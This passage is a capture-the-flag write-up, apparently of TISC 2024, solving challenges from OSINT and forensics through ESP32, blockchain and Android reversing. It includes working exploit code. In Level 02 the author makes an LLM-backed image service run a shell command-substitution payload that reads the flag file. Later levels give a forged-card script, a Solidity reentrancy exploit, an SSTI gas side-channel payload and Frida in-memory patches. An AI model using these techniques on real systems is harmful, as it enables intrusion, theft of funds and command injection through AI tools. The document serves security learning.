Navigating the Digital Labyrinth (Level 01)

Searching for the mysterious vi_vox223 using Sherlock, we see an Instagram profile with the same name. Under his stories, this elusive figure has created a Discord bot with ID 1284197383864979486. We have the exclusive opportunity to grace our server with the bot’s presence using this link:

https://discord.com/oauth2/authorize?client_id=1284197383864979486&permissions=0&scope=bot%20applications.commands

We need to have the elusive D0PP3L64N63R role to unlock the hidden menu. After that, we can access the filesystem and download the Update_030624.eml file.

Opening this file, there is an email attached:

Dear Headquarters,=20
 
I trust this message reaches you securely. I am writing to provide an =
update on my current location. I am currently positioned close to the =
midpoint of the following IDs:
 
=09
*	8c1e806a3ca19ff=20
=09
*	8c1e806a3c125ff=20
=09
*	8c1e806a3ca1bff=20
 
My location is pinpointed with precision using Uber's cutting-edge geo=
spatial technology, which employs shape-based location triangulation a=
nd partitions areas of the Earth into identifiable cells.
 
To initiate secure communication with me, please adhere to the discree=
t method we've established. Transmit the identified location's name th=
rough the secure communication channel accessible at https://www.linke=
din.com/company/the-book-lighthouse
 
 
Awaiting your confirmation and further operational directives.=20
 
Best regards,=20
 
Vivoxanderith

Using the location IDs provided, we can pinpoint the location to this:

We can also visit the Linkedin provided to access the secret agent under the guise of a Telegram bot with username @TBL_DictioNaryBot. Sending the identified location will confirm our identity and give us the flag.

“

Language, Labyrinth and (Graphics)Magick (Level 02)

In this level, PALINDROME employs the power of LLMs to edit photographic evidences of their crimes. we’re provided with 1 web interface (3, actually, cos remote kept crashing) where we can upload images, specify some transformation on the image, and download the newly transformed image. It uses an LLM to generate GraphicsMagick commands which are run on the server (this is totally unnecessary and it is clear PALINDROME just wants to hop on the LLM bandwagon). We can get the LLM to generate our own GraphicsMagick commands like so:

gm convert "input" "output"

and the LLM will replace the input and output filenames accordingly. Neat!

In GraphicsMagick, we can add comments to images, which will append the string to the end of the image file - we can see this when we strings it. Since the command is being ran directly in the shell (bash presumably), we can use globbing to put the contents of flag.txt in the comments.

gm convert "input" -comment "$(cat /**/flag*.txt)" "output"

Uploading any image and entering this command, then downloading the image and running strings on it, will give us the flag.

Digging Up History (Level 03)

Looks like we got our hands on one of PALINDROME’s agent’s disk images… We’re provided with a huge 1.3GB csitfanUPDATED0509.ad1 file. We can use FTK Imager to open this and view the contents of the disk.

The title of the challenge hints towards checking out the user’s browser history, so we should do exactly that. Under the Documents and Settings folder, there are 2 browser folders - Mozilla and “Mypal68” (but the Mozilla folder was empty). Going to “Mypal68”, we can see 2 profiles - ibxh2pqf.default and a80ofn6a.default-default. The former is mostly empty, so let’s look at the latter, where we find the places.sqlite file. This file generally contains the browser history for Mozilla browsers - exactly what we wanted! Let’s extract this file and open it.

sqlite> select * from sqlite_master;
table|moz_origins|moz_origins|2|CREATE TABLE moz_origins ( 
    id INTEGER PRIMARY KEY,
    prefix TEXT NOT NULL,
    host TEXT NOT NULL,
    frecency INTEGER NOT NULL,
    UNIQUE (prefix, host) 
)
index|sqlite_autoindex_moz_origins_1|moz_origins|3|
table|moz_places|moz_places|4|CREATE TABLE moz_places ( 
    id INTEGER PRIMARY KEY,
    url LONGVARCHAR,
    title LONGVARCHAR,
    rev_host LONGVARCHAR,
    visit_count INTEGER DEFAULT 0,
    hidden INTEGER DEFAULT 0 NOT NULL,
    typed INTEGER DEFAULT 0 NOT NULL,
    frecency INTEGER DEFAULT -1 NOT NULL,
    last_visit_date INTEGER,
    guid TEXT,
    foreign_count INTEGER DEFAULT 0 NOT NULL,
    url_hash INTEGER DEFAULT 0 NOT NULL,
    description TEXT,
    preview_image_url TEXT,
    origin_id INTEGER REFERENCES moz_origins(id)
)
index|moz_places_url_hashindex|moz_places|5|CREATE INDEX moz_places_url_hashindex ON moz_places (url_hash)
index|moz_places_hostindex|moz_places|6|CREATE INDEX moz_places_hostindex ON moz_places (rev_host)
index|moz_places_visitcount|moz_places|7|CREATE INDEX moz_places_visitcount ON moz_places (visit_count)
index|moz_places_frecencyindex|moz_places|8|CREATE INDEX moz_places_frecencyindex ON moz_places (frecency)
index|moz_places_lastvisitdateindex|moz_places|9|CREATE INDEX moz_places_lastvisitdateindex ON moz_places (last_visit_date)
index|moz_places_guid_uniqueindex|moz_places|10|CREATE UNIQUE INDEX moz_places_guid_uniqueindex ON moz_places (guid)
index|moz_places_originidindex|moz_places|11|CREATE INDEX moz_places_originidindex ON moz_places (origin_id)
...

Wow so many tables…

Luckily, the moz_places table was the only table we needed - when dumping the contents of this table, we see the following row:

17|https://csitfan-chall.s3.amazonaws.com/flag.sus|flag.sus|moc.swanozama.3s.llahc-naftisc.|0|0|0|0|1725522130630000|0Ds_Z7hyaY9W|0|47357524652742|||10

The downloaded file contains the Base64-encoded flag.

AlligatorPay (Level 04)

In this level, PALINDROME is using a service to conduct their shady money laundering schemes where we can upload an “AGPAY” card. The card validation is done client-side, so we can reverse the logic to create our own card. If our card’s balance is equal to 313371337, we will get the flag.

The card format has several things we need to look out for:

1. Starts with AGPAY and ends with ENDAGP
2. Has data corresponding to card_number + expiry_date + balance, encrypted using AES-CBC, with a key and IV of our choice
3. Has a checksum of md5(encrypted_data + iv)

I pasted the script into Gemini and asked it to create a Python script for me. It was actually pretty good and I didn’t have to modify much to obtain a valid card!

import random
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
 
def generate_card_data(card_number, expiry_date, balance):
    # Convert card data to binary format
    card_number_bytes = card_number.encode()
    expiry_date_bytes = expiry_date.encode()
    balance_bytes = balance.to_bytes(8, byteorder='big')
 
    # Combine card data
    card_data = card_number_bytes + expiry_date_bytes + balance_bytes
 
    return card_data
 
def encrypt_data(card_data, encryption_key, iv):
    # Pad data to 16-byte boundary
    padded_data = pad(card_data, AES.block_size)
 
    # Create AES cipher object
    cipher = AES.new(encryption_key, AES.MODE_CBC, iv)
 
    # Encrypt card data
    encrypted_data = cipher.encrypt(padded_data)
 
    return encrypted_data
 
def calculate_checksum(encrypted_data, iv):
    # Combine encrypted data and IV
    combined_data = encrypted_data + iv
 
    # Calculate md5 hash
    hash_object = hashlib.md5()
    hash_object.update(combined_data)
    checksum = hash_object.digest()
 
    return checksum
 
def create_agpay_file(card_data, encrypted_data, checksum, filename):
    # Create file header
    header = b"AGPAY01" + b"\x00" * 32 + b"\x00" * 10 + b"\x00" * 16
 
    # Create file footer
    footer = b"ENDAGP" + checksum
 
    # Combine header, encrypted data, and footer
    file_contents = header + encrypted_data + footer
 
    # Write file contents to disk
    with open(filename, "wb") as f:
        f.write(file_contents)
 
if __name__ == "__main__":
    # Generate card data
    card_number = "1234567890123456"
    expiry_date = "2025-12-31"
    balance = 313371337
 
    card_data = generate_card_data(card_number, expiry_date, balance)
    encrypted_data = encrypt_data(card_data, b"\x00" * 32, b"\x00" * 16)  # Null bytes for key and IV
    checksum = calculate_checksum(encrypted_data, b"\x00" * 16)
 
    # Create AGPAY file
    filename = "card.txt"
    create_agpay_file(card_data, encrypted_data, checksum, filename)

After generating our card and uploading it, we get our flag.

Hardware isn’t that Hard! (Level 05)

After their failure at implementing a secure credit transfer scheme for their funds, you’d think PALINDROME has learnt from their mistakes and would stop implementing their own systems… but apparently not - now they’re rolling their own secure communications channel as well. We’re provided with a flash dump of the esp32 chip. The flash dump contains several partitions, including the app that we’re interested in. We can view these partitions using https://github.com/tenable/esp32_image_parser.

$ : esp32_image_parser.py show_partitions flash_dump.bin
reading partition table...
entry 0:
label      : nvs
offset     : 0x9000
length     : 20480
type       : 1 [DATA]
sub type   : 2 [WIFI]
 
entry 1:
label      : otadata
offset     : 0xe000
length     : 8192
type       : 1 [DATA]
sub type   : 0 [OTA]
 
entry 2:
label      : app0
offset     : 0x10000
length     : 1310720
type       : 0 [APP]
sub type   : 16 [ota_0]
 
entry 3:
label      : app1
offset     : 0x150000
length     : 1310720
type       : 0 [APP]
sub type   : 17 [ota_1]
 
entry 4:
label      : spiffs
offset     : 0x290000
length     : 1441792
type       : 1 [DATA]
sub type   : 130 [unknown]
 
entry 5:
label      : coredump
offset     : 0x3f0000
length     : 65536
type       : 1 [DATA]
sub type   : 3 [unknown]
 
MD5sum:
972dae2ff872a0142d60bad124c0666b
Done

And we can dump the app0 partition into an ELF file that we can reverse:

esp32_image_parser.py create_elf flash_dump.bin -partition app0 -output app0.elf

Unfortunately, the chip uses the xtensa instruction set, which IDA doesn’t support that well - we can’t decompile stuff nicely. But luckily, Ghidra is able to output nice decomp so we’ll use Ghidra instead!

I was hoping that the main function would be easy to find, but that’s not the case. In here, we start at the start function, which has a lot a lot of calls everywhere. Even worse, the binary is stripped so we don’t have proper function names. I tried to trace it but gave up after spending hours trying to identify the main function.

After clicking through Ghidra for pretty long, I found this banner string in .dram0.data that seems quite suspicious:

s__3ffbdb8a                                     XREF[2,13]:  400d0058(*), 
s__3ffbdb8b                                                  actual_main:400d16d5(R), 
s__3ffbdb8c                                                  400d006c(*), 400d0070(*), 
s__3ffbdb8d                                                  400d0074(*), 400d0080(*), 
s_BRYXcorp_CrapTPM_3ffbdb7a                                  FUN_400d1964:400d196a(R), 
FUN_400d1964:400d1975(R), 
FUN_400d199c:400d19aa(W), 
FUN_400d19b4:400d19cf(W), 
FUN_400d19d8:400d19ed(R), 
FUN_400d19d8:400d19f6(R), 
FUN_400d1a14:400d1a4e(R), 
FUN_400d1a64:400d1ad1(R), 
FUN_400d1b04:400d1b2c(R)  
3ffbdb7a 42 52 59                               "BRYXcorp_CrapTPM"
         58 63 6f 
         72 70 5f 

This string seems like a likely banner output from the chip when we interact with it. We can jump to its xrefs to find our main function.

void FUN_400d1614(uint param_1) {
    byte bVar1;
    int iVar2;
    int iVar3;
    byte bVar4;
    uint uVar5;
    int iVar6;
    int in_WindowStart;
    undefined auStack_30 [12];
    uint uStack_24;
 
    memw();
    memw();
    uStack_24 = _DAT_3ffc20ec;
    FUN_400d36ec(0x3ffc1ecc,s_i2c_recv_%d_byte(s):_3f400163,param_1);
    iVar2 = (uint)(in_WindowStart == 0) * (int)auStack_30;
    iVar3 = (uint)(in_WindowStart != 0) * (int)(auStack_30 + -(param_1 + 0xf & 0xfffffff0));
    FUN_400d37e0(0x3ffc1cdc,iVar2 + iVar3,param_1);
    FUN_400d2fa8(iVar2 + iVar3,param_1);
    if (0 < (int)param_1) {
        uVar5 = (uint)*(byte *)(iVar2 + iVar3);
        if (uVar5 != 0x52) goto LAB_400d1689;
        memw();
        uRam3ffc1c80 = 0;
    }
    while( true ) {
        uVar5 = uStack_24;
        param_1 = _DAT_3ffc20ec;
        memw();
        memw();
        if (uStack_24 == _DAT_3ffc20ec) break;
        func_0x40082818();
    LAB_400d1689:
        if (uVar5 == L'F') {
            iVar6 = 0;
            do {
                memw();
                bVar1 = (&DAT_3ffbdb6a)[iVar6];
                bVar4 = FUN_400d1508();
                memw();
                *(byte *)(iVar6 + 0x3ffc1c80) = bVar1 ^ bVar4;
                iVar6 = iVar6 + 1;
            } while (iVar6 != 0x10);
        }
        else if (uVar5 == L'M') {
            memw();
            uRam3ffc1c80 = DAT_3ffbdb7a;
            memw();
        }
        else if ((param_1 != 1) && (uVar5 == L'C')) {
            memw();
            bVar1 = *(byte *)(*(byte *)(iVar2 + iVar3 + 1) + 0x3ffbdb09);
            bVar4 = FUN_400d1508();
            memw();
            (&DAT_3ffc1c1f)[*(byte *)(iVar2 + iVar3 + 1)] = bVar1 ^ bVar4;
        }
    }
    return;
}

Some comparisons are being made, presumably against our input. So that’s how we can interact with the chip - by sending a byte of either F, M or C. The protocol is using the I2C protocol, which according to Wikipedia and the instructions provided on remote, consists of a 2 byte data stream. The 1st byte is used to specify the direction of data transfer (read or write) and the address of the chip, while the second byte is the data itself. Since we also need to receive output from the bus, reading is a 2-step process - first read from the chip into the bus, then from the bus into console.

I used the following to guess the address of the chip:

for i in range(0x7f):
    target = bin(i)[2:].rjust(7, "0")
    target += "0"
    target = hex(int(target, 2))[2:].rjust(2, "0")
    payload = f"SEND {target} 4d"
    print(payload)
    p.sendlineafter(b">", payload.encode())
 
    target = bin(i)[2:].rjust(7, "0")
    target += "1"
    target = hex(int(target, 2))[2:].rjust(2, "0")
    payload = f"SEND {target} 00"
    p.sendlineafter(b">", payload.encode())
 
    p.sendlineafter(b">", b"RECV 32")
    output = p.recvline().strip()
    if output != (b"00 " * 32).strip():
        print(i, output)

When we interact with the “F” endpoint, we get a random string of data that is probably the encrypted flag. Upon initialization, the chip randomly generates a seed key that is later processed and used to encrypt the flag. Based on this, we can determine the possible keys based on the flag format, and narrow down the possible keys after each encryption, until we have the final key which we can use to decrypt the flag.

I used this script to interact with the chip and read the flag:

from pwn import *
 
p = remote("chals.tisc24.ctf.sg", 61622)
p.recvuntil(b"Read More:")
 
# device found: 105 (0x69)
dev_num = 0x69
 
def send(val):
    target = bin(dev_num)[2:].rjust(7, "0")
    target += "0"
    target = hex(int(target, 2))[2:].rjust(2, "0")
 
    data = hex(val)[2:].rjust(2, "0")
 
    payload = f"SEND {target} {data}"
    print(payload)
    p.sendlineafter(b">", payload.encode())
 
def read():
    target = bin(dev_num)[2:].rjust(7, "0")
    target += "1"
    target = hex(int(target, 2))[2:].rjust(2, "0")
    payload = f"SEND {target} 00"
    p.sendlineafter(b">", payload.encode())
 
    p.sendlineafter(b">", b"RECV 16")
    return p.recvline().strip()
 
send(0x46)
output = read()
output = output.split(b" ")
print(output)
 
output = [int(x, 16) for x in output]
 
# determine initial state from the first 5 known bytes
possible_states = []
known = b"TISC{"
 
# we don't know the 1st byte
for i in range(0xffff + 1):
    if (i ^ known[0]) & 0xff == output[0]:
        possible_states.append(i)
 
print(len(possible_states))
print([hex(i) for i in possible_states])
 
for i in range(1, len(known)):
    c = output[i] ^ known[i]
 
    new_possible_states = []
    for j in possible_states:
        u1 = (j & 0xffff) << 7 ^ (j & 0xffff)
        u1 = (u1 & 0xffff) >> 9 ^ (u1 & 0xffff)
        final = (u1 & 0xffff) << 8 ^ (u1 & 0xffff)
        new_possible_states.append(final)
 
    possible_states = new_possible_states
    print([hex(i) for i in possible_states])
 
    to_remove = []
    for j in possible_states:
        if ((j & 0xffff) ^ known[i]) & 0xff != output[i]:
            to_remove.append(j)
 
    for j in to_remove:
        possible_states.remove(j)
 
    print(len(possible_states))
 
# decrypt the rest!
flag = [i for i in known]
 
cur = new_possible_states[0]
for i in range(5, len(output)):
    u1 = (cur & 0xffff) << 7 ^ (cur & 0xffff)
    u1 = (u1 & 0xffff) >> 9 ^ (u1 & 0xffff)
    final = (u1 & 0xffff) << 8 ^ (u1 & 0xffff)
    cur = final
 
    d = ((cur & 0xffff) ^ output[i]) & 0xff
    print(hex(d))
    flag.append(d)
 
print("".join([chr(i) for i in flag]))

RE Path - Noncevigator (Level 06)

Finally, PALINDROME is outsourcing their technology to something well-known and trusted - blockchain! Despite being on the RE path, this was strangely not an RE challenge but a blockchain/pwn challenge. The main 2 vulnerabilities are here:

function withdraw() external {
    uint256 balance = getUserBalance(msg.sender);
    require(balance > 0, "Insufficient balance");
 
    (bool success, ) = msg.sender.call{value: balance}("");
    require(success, "Failed to withdraw Ether");
 
    userBalances[msg.sender] = 0;
}

We can do a reentrancy attack here. I used the following to withdraw all the funds:

function withdraw() external {
    msg.sender.call{value: address(this).balance}("");
}
 
receive() external payable {
    if (address(this).balance <= 170 ether) {
        travelFundvault.withdraw();
    }
}

Once we have sufficient funds, we can call the startUnlockingGate function.

travelFundVaultAddr = tfvAddr;
treasureLocations["hindhede"] = hindhedeAddr;
treasureLocations["coneyIsland"] = coneyIslandAddr;
treasureLocations["pulauSemakau"] = pulauSemakauAddr;
isLocationOpen["coneyIsland"] = true;
 
function startUnlockingGate(string calldata _destination) public {
    require(treasureLocations[_destination] != address(0));
    require(msg.sender.balance >= 170 ether);
 
    (bool success, bytes memory retValue) = treasureLocations[_destination].delegatecall(abi.encodeWithSignature("unlockgate()"));
    require(success, "Denied entry!");
    require(abi.decode(retValue, (bool)), "Cannot unlock gate!");
}

And here, there isn’t actually any function called “unlockgate()” in the contract (the contracts for treasureLocations were not released). Eventually, we need to deploy our own contract to implement this function.

But how do we deploy our own contract to the hardcoded addresses? When generating an address for a contract deployment using the CREATE opcode (not CREATE2), the EVM takes into account the deployer’s address and a nonce that increments every time a contract is deployed. This address is thus deterministic and can even be controlled partially by the attacker. We can write a script to bruteforce a possible nonce value that will give us one of the contract’s addresses:

import rlp
from sha3 import keccak_256
 
sender = bytes.fromhex("0x7cd3cB56F3DaE8825eF0ebA1916eE98D4bcb80E8"[2:])
 
desired = [
    "0xb3ccA2077c824C19bd689616b8399230057a5a1D", # coneyIsland
    "0xfba9b795E98591Be941BD41C57D2072Ada028B23", # pulauSemakau
    "0xb9d877eFF9430734d2C4653ed389FEB6DF5F3A36" # hindhede
]
 
desired = [d[2:].lower() for d in desired]
 
def gen_contract_addr(sender, nonce):
    return keccak_256(rlp.encode([sender, nonce])).hexdigest()[-40:]
 
for nonce in range(2, 2 ** 256):
    if gen_contract_addr(sender, nonce) in desired:
        print(nonce, gen_contract_addr(sender, nonce))
        break

From this, pulauSemakau’s address seems to be manually set by the challenge to be achievable within a small nonce (30-50). So we can repeatedly deploy contracts until we deploy a contract at the required nonce value.

What can we do with the unlockGate call? Since it’s being called with delegatecall, the memory layout of the calling contract is inherited directly by the callee. So, we can edit the isLocationOpen to directly set pulauSemakau to true and get the flag.

Full exploit contracts:

pragma solidity ^0.8.19;
import { Noncevigator, TravelFundvault } from "./Noncevigator.sol";
 
// 1. run solve.py to generate the correct nonce
// 2. deploy Exploit to get enough ether, and extract all funds
// 3. set wallet nonce to the value
// 4. deploy Unlocker at the desired address
// 5. from wallet, call startUnlockingGate("pulauSemakau")
 
// 46
 
contract Exploit {
Noncevigator public noncevigator;
TravelFundvault public travelFundvault;
 
constructor(address _Noncevigator) {
noncevigator = Noncevigator(_Noncevigator);
travelFundvault = TravelFundvault(noncevigator.getVaultLocation());
}
 
function execute() external payable {
travelFundvault.deposit{value: msg.value}();
travelFundvault.withdraw();
}
 
function solve() external payable {
noncevigator.startUnlockingGate("pulauSemakau");
}
 
function withdraw() external {
msg.sender.call{value: address(this).balance}("");
}
 
function getCode(address target) external returns (bytes memory o_code) {
return target.code;
}
 
receive() external payable {
if (address(this).balance <= 170 ether) {
travelFundvault.withdraw();
}
}
}
 
contract Unlocker {
mapping(string => address) private treasureLocations;
mapping(string => bool) public isLocationOpen;
address private travelFundVaultAddr;
bool isCompassWorking;
 
function unlockgate() external returns (bool) {
isLocationOpen["pulauSemakau"] = true;
return true;
}
}

RE Path - Baby Flagchecker (Level 07)

This level had a bit of difficult RE, but it was mostly a blockchain chall too. Seems like PALINDROME really likes blockchain…

The web interface has SSTI that allows us to view the entire response data object from this function. Unfortunately we can’t use this for RCE because it limits our input length to 32, which is too short for an RCE payload.

def call_check_password(setup_contract, password):
    # Call checkPassword function
    passwordEncoded = '0x' + bytes(password.ljust(32, '\0'), 'utf-8').hex()
 
    # Get result and gas used
    try:
        gas = setup_contract.functions.checkPassword(passwordEncoded).estimate_gas()
        output = setup_contract.functions.checkPassword(passwordEncoded).call()
        logger.info(f'Gas used: {gas}')
        logger.info(f'Check password result: {output}')
    except Exception as e:
        logger.error(f'Error calling checkPassword: {e}')
 
    # Return debugging information
    return {
        "output": output,
        "contract_address": setup_contract.address,
        "setup_contract_bytecode": os.environ['SETUP_BYTECODE'],
        "adminpanel_contract_bytecode": os.environ['ADMINPANEL_BYTECODE'],
        "secret_contract_bytecode": os.environ['SECRET_BYTECODE'],
        "gas": gas
    }

setup_contract_bytecode and adminpanel_contract_bytecode are the partial bytecodes of the respective contracts. I used https://ethervm.io/decompile to decompile the bytecode into semi-readable Solidity code, but it wasn’t really helpful. In the end, I painfully parsed the assembly step-by-step to figure out the stack state and stuff.

After hours of reversing, my revelation was that in the assembly for adminpanel, we can see that it checks if the input is of length 16. If so, it slices off the TISC prefix here:

0023    60    PUSH1 0x04
0025    35    CALLDATALOAD

and calls the secret contract to get the flag (I think, we can’t actually tell from the delegatecall).

0000    5F    PUSH0
0001    35    CALLDATALOAD
0002    80    DUP1
0003    60    PUSH1 0xd8
0005    1C    SHR
0006    64    PUSH5 0x544953437b
000C    14    EQ // check if input starts with TISC{
000D    81    DUP2
000E    60    PUSH1 0x80
0010    1B    SHL
0011    60    PUSH1 0xf8
0013    1C    SHR
0014    60    PUSH1 0x7d
0016    14    EQ // check if input[15] == }
// ...
0043    60    PUSH1 0x20
0045    5F    PUSH0
0046    60    PUSH1 0x04
0048    60    PUSH1 0x3c
004A    84    DUP5 // calldata[0x24:0x24 + 0x32] --> address of delegatecall
004B    5A    GAS
// likely call secret contract to get the flag
// mem[0x0:0x20] = address(calldata[0x24:0x24 + 0x32]).delegatecall(memory[0x4:0x40])
004C    F4    DELEGATECALL
004D    50    POP
004E    5F    PUSH0
004F    51    MLOAD
0050    5F    PUSH0
0051    5F    PUSH0

Afterwards, it does some comparison stuff here:

0064    60    PUSH1 0x0d // for loop until 0xd
0066    14    EQ
0067    61    PUSH2 0x0078
006A    57    *JUMPI
006B    90    SWAP1
006C    61    PUSH2 0x0052
006F    56    *JUMP
0070    5B    JUMPDEST
0071    60    PUSH1 0x01 // tos += 1
0073    01    ADD        //
0074    61    PUSH2 0x005e
0077    56    *JUMP
0078    5B    JUMPDEST
0079    81    DUP2
007A    60    PUSH1 0x0d
007C    14    EQ
007D    60    PUSH1 0x40
007F    52    MSTORE
0080    60    PUSH1 0x20
0082    60    PUSH1 0x40
0084    F3    *RETURN

I’m not sure why, but apparently matching each character spends a bit more gas. So based on the gas usage which we can see via the SSTI, we can sequentially determine each character of the flag. Each time the gas increases, we know that character is correct.

This is the payload I used:

{_________}{{response_data}}

Wallfacer (Level 08)

Is PALINDROME secretly the Earth-Trisolaris Organization??

We’re provided with an Android app which seems to be a very useless input field that does nothing but store the input in-memory. Opening the APK in JADX, we can see a hidden activity in AndroidManifest.xml (com.wall.facer.query). We can manually load this activity in Android Studio to reveal a activity that requests for a IV and secret key, to decrypt the flag.

Also, we can see a few suspicious values in res/values/strings.xml.

<string name="base">d2FsbG93aW5wYWlu</string>
<string name="dir">ZGF0YS8</string>
<string name="filename">c3FsaXRlLmRi</string>
<string name="str">4tYKEbM6WqQcItBx0GMJvssyGHpVTJMhpjxHVLEZLVK6cmIH7jAmI/nwEJ1gUDo2</string>
<string name="submit">Submit</string>
<string name="tag">TISC</string>

The base64 values are wallowinpain, data/ and sqlite.db respectively. Unzipping the APK and going to the assets folder, we can see the sqlite.db and several strange files in data/:

#             name             type    size      modified
─────────────────────────────────────────────────────────────
0   0$d4a1NDA5TkDcvPPA_97qGA   file   1.4 KB   43 years ago
1   1$-jdd8_tomhupBCl9KWd8xA   file   1.3 KB   43 years ago
2   2$lFLwXjQ9kfzjBqIAI43f-Q   file   2.1 KB   43 years ago
3   3$JwwVFYd1_JvfrcL91sUOoQ   file   1.2 KB   43 years ago
4   4$Xz61-8GuN_p5gECXlLwIyA   file   1.8 KB   43 years ago
5   5$Je3mRGwJ1MvkQ-ZXfApZgQ   file   1.9 KB   43 years ago
6   6$KrPqTP4Iu8-DNlpja70rcA   file   1.2 KB   43 years ago
7   7$K30_BnqsT-e6-qRdbWhW4Q   file   1.4 KB   43 years ago
8   8$svSIG6hueT4M509sCJTACQ   file    709 B   43 years ago

sqlite.db is not a valid SQLite database (though it has the SQLite 3 magic bytes) and trying to open it gives an error. I spent a good amount of time thinking the db was encrypted and tried to decrypt it to no avail.

After digging in JADX a bit, I found this really suspicious function that seems to be reading a file and decrypting it:

public C0289q1(byte[] bArr) {
    this.a = 17;
    this.b = bArr;
    this.c = new byte[256];
    for (int i = 0; i < 256; i++) {
    ((byte[]) this.c)[i] = (byte) i;
    }
    int i2 = 0;
    for (int i3 = 0; i3 < 256; i3++) {
        byte[] bArr2 = (byte[]) this.c;
        byte b = bArr2[i3];
        byte[] bArr3 = (byte[]) this.b;
        i2 = (i2 + (b & 255) + (bArr3[i3 % bArr3.length] & 255)) & 255;
        bArr2[i3] = bArr2[i2];
        bArr2[i2] = b;
    }
}

public static ByteBuffer K(Context context, String str) {
    int i2;
    // opens from the assets/ folder
    InputStream open = context.getAssets().open(str); 
    ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
    byte[] bArr = new byte[1024];
    while (true) {
        int read = open.read(bArr);
        if (read == -1) {
            break;
        }
        byteArrayOutputStream.write(bArr, 0, read);
    }
    open.close();
    byte[] byteArray = byteArrayOutputStream.toByteArray();
    byte[] bArr2 = new byte[128];
    byte[] bArr3 = new byte[4];
    System.arraycopy(byteArray, 4096, bArr3, 0, 4);
    int i3 = ByteBuffer.wrap(bArr3).getInt();
    byte[] bArr4 = new byte[i3];
    System.arraycopy(byteArray, 4100, bArr4, 0, i3);
    System.arraycopy(byteArray, 4100 + i3, bArr2, 0, 128);
    C0289q1 c0289q1 = new C0289q1(bArr2);
    byte[] bArr5 = new byte[i3];
    int i4 = 0;
    int i5 = 0;
    for (i2 = 0; i2 < i3; i2++) {
        i4 = (i4 + 1) & 255;
        byte[] bArr6 = (byte[]) c0289q1.c;
        byte b2 = bArr6[i4];
        i5 = (i5 + (b2 & 255)) & 255;
        bArr6[i4] = bArr6[i5];
        bArr6[i5] = b2;
        bArr5[i2] = (byte) (bArr6[(bArr6[i4] + b2) & 255] ^ bArr4[i2]);
    }
    return ByteBuffer.wrap(bArr5);
}

Most likely, this function is decrypting the mysterious sqlite.db file. Using Frida, I re-implemented the 2 sections in JS using the wrapper provided:

function ByteBufferToInt(byteArray) {
    // Ensure the byte array has at least 4 bytes
    console.log(byteArray, byteArray.length)
    if (byteArray.length < 4) {
        throw new Error("ByteBuffer must contain at least 4 bytes.");
    }
 
    // Extract the 4 bytes
    const view = new DataView(new Uint8Array(byteArray).buffer);
    const value = view.getInt32(0); // Little-endian by default
 
    // Return the integer value
    return value;
}
 
class C0289q1 {
    constructor(bArr) {
        this.a = 17
        this.b = bArr
        this.c = []
        for (let i = 0; i < 256; i++) {
            this.c[i] = i
        }
 
        let i2 = 0
        for (let i = 0; i < 256; i++) {
            let bArr2 = this.c
            let b = bArr2[i]
            let bArr3 = this.b
 
            i2 = (i2 + (b & 255) + (bArr3[i % bArr3.length] & 255)) & 255
            bArr2[i] = bArr2[i2]
            bArr2[i2] = b
        }
    }
}
 
// ...
// attach to mainActivity
 
const filename = "sqlite.db"
 
const inputStream = assetManager.open(filename)
const byteArrayOutputStream = Java.use("java.io.ByteArrayOutputStream").$new()
let buffer = Java.array('byte', [1024])
while (true) {
    let length = inputStream.read(buffer)
    if (length < 0) {
        break
    }
    byteArrayOutputStream.write(buffer, 0, length)
}
let _bytes = byteArrayOutputStream.toByteArray()
 
let bytes = []
for (let i = 0; i < _bytes.length; i++) {
    bytes.push(_bytes[i])
}
 
console.log(bytes.slice(4096, 4096 + 4))
 
let bArr3 = bytes.slice(4096, 4096 + 4)
let i3 = ByteBufferToInt(bArr3)
 
let bArr4 = bytes.slice(4100, 4100 + i3)
let bArr2 = bytes.slice(4100 + i3, 4100 + i3 + 128)
let c0289q1 = new C0289q1(bArr2)
let bArr5 = []
let i4 = 0
let i5 = 0
 
for (let i2 = 0; i2 < i3; i2++) {
    i4 = (i4 + 1) & 255
    let bArr6 = c0289q1.c
    let b2 = bArr6[i4]
    i5 = (i5 + (b2 & 255)) & 255
    bArr6[i4] = bArr6[i5]
    bArr6[i5] = b2
    bArr5[i2] = bArr6[(bArr6[i4] + b2) & 255] ^ bArr4[i2]
}
 
let result = []
for (var i = 0; i < bArr5.length; ++i) {
    result.push(bArr5[i] & 0xff)
}

On logging the result, we can convert it from the byte array into a binary in Python and obtain a decrypted .dex file! (PALINDROME is really sneaky)

Opening the new .dex file in JADX, we see a few more clues:

1. Entering “I am a tomb” into the MainActivity input pwill generate a .so native library and load it into the application. (“I am a tomb” - the scene where Blue Space encounters the 4D spaceship about to be 3-dimensionalized)
2. “Only Advance” will trigger a function from the native library to generate the IV and key for flag decryption. (“Only Advance” - Wade when sending Tianming’s brain to the First Trisolaran Fleet)

However, when we enter in the 2 inputs, in the logs, we see that we need to patch the binary to bypass certain checks. In Frida, we can hook onto System.load, just before the native library is deleted, so we can extract it from the device’s filesystem and reverse/patch it.

System.load.implementation = function(library) {
    if (library.endsWith("libnative.so")) {
        console.log("loaded patched binary")
        let file = File.$new("/data/user/0/com.wall.facer/files/libnative.so")
        let fileOutputStream = FileOutputStream.$new(file)
        fileOutputStream.write(Base64.decode(libnative, 0))
        this.load.call(this, file.getAbsolutePath())
    } else {
        this.load.call(this, library)
    }
}

The following part was really painful to reverse and patch. There are 3 checks that we need to bypass:

1. “I need a very specific file to be available”: /sys/wall/facer file needs to exist. Unfortunately, we cannot create the file normally, but we can patch the binary to change it to check for some other file, like /etc/passwd.
2. I don’t even know what the next function checks, but we can patch the value of RAX used in the jumptable so that we jump to the “Input verification success” part instead of the “hahaha” part.
3. “Bet you can’t fix the correct constant”: I also don’t know what’s going on here, but we can just patch the binary to set the RAX value to not jump to the “I’m afraid I’m going to have to stop you” part

After all the patches were done, we can technically hook onto System.load:{java} and replace the library in the filesystem with the patched one. However, I couldn’t get it to work properly, so I patched the loaded library in-memory instead.

Log.i.overload("java.lang.String", "java.lang.String").implementation = function(tag, msg) {
    if (tag == "TISC" && msg == "Native library loaded!") {
        console.log("patching memory")
 
        let libnativeModule = Process.enumerateModulesSync().filter(m => m.name == "libnative.so")[0]
        console.log(JSON.stringify(libnativeModule))
        let base = parseInt(libnativeModule.base, 16)
        console.log("base: ", base.toString(16))
 
        // make whole module writable
        Memory.protect(ptr(base), libnativeModule.size, "rwx")
 
        // change file from "/sys/wall/facer" to "/data/aaaaaaaaa"
        let file = Array.from("/etc/passwd\x00").map(c => c.charCodeAt(0))
